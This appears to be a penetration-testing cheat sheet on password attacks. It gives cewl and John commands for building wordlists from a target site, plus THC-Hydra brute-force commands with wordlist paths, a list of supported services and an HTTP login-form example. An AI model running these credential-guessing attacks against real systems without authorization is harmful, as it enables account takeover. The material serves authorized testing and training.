Password Attacks

Brute force and Wordlists

HINT

Try default credentials first: ihebski/DefaultCreds-cheat-sheet

If that doesn’t work, try the obvious ones first (like root, toor, password, or the service name).

If that also doesn’t work, try credentials already harvested from the environment.

Create a custom wordlist

  1. Scrape words from the target site: cewl --depth 5 --min_word_length 5 --write passwords.txt --ua "curl/7.83.0" --with-numbers -v {URL}
  2. Mutate them with John's rules: john --wordlist=passwords.txt --rules --stdout > mutated.txt

THC-Hydra

HINT

If you use a long password list, you can prefix the command with timeout 30m (i.e. timeout 30m hydra ...) to stop the attack after 30 minutes.

  • hydra -v -V -u -t 4 {TWO_OF_THE_BELOW_OPTIONS_EXCEPT_WITH_OPTION_C} -s {PORT} {IP} {SERVICE}
    • -l {USERNAME}
    • -p {PASSWORD}
    • -L {USERNAME_LIST}
      • /usr/share/seclists/Usernames/top-usernames-shortlist.txt
      • /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
    • -P {PASSWORD_LIST}
      • /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
      • /usr/share/seclists/Passwords/Common-Credentials/best1050.txt
      • /usr/share/john/password.lst
      • /usr/share/wordlists/rockyou.txt
      • /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt
      • Or generate your own password list with cewl
    • -C {COLON_SEPARATED_CREDENTIALS_LIST} (replaces both the user and the password option)
      • /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
  • Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Example usage for HTTP forms (the string after the last colon is the text that marks a failed login):

hydra -v -V -u -t 4 -L {USERNAME_LIST} -P {PASSWORD_LIST} {IP} http-post-form "/login.asp:username=^USER^&password=^PASS^&submit=Enter:Login failed!"

Relevant Note(s): Crack the Hashes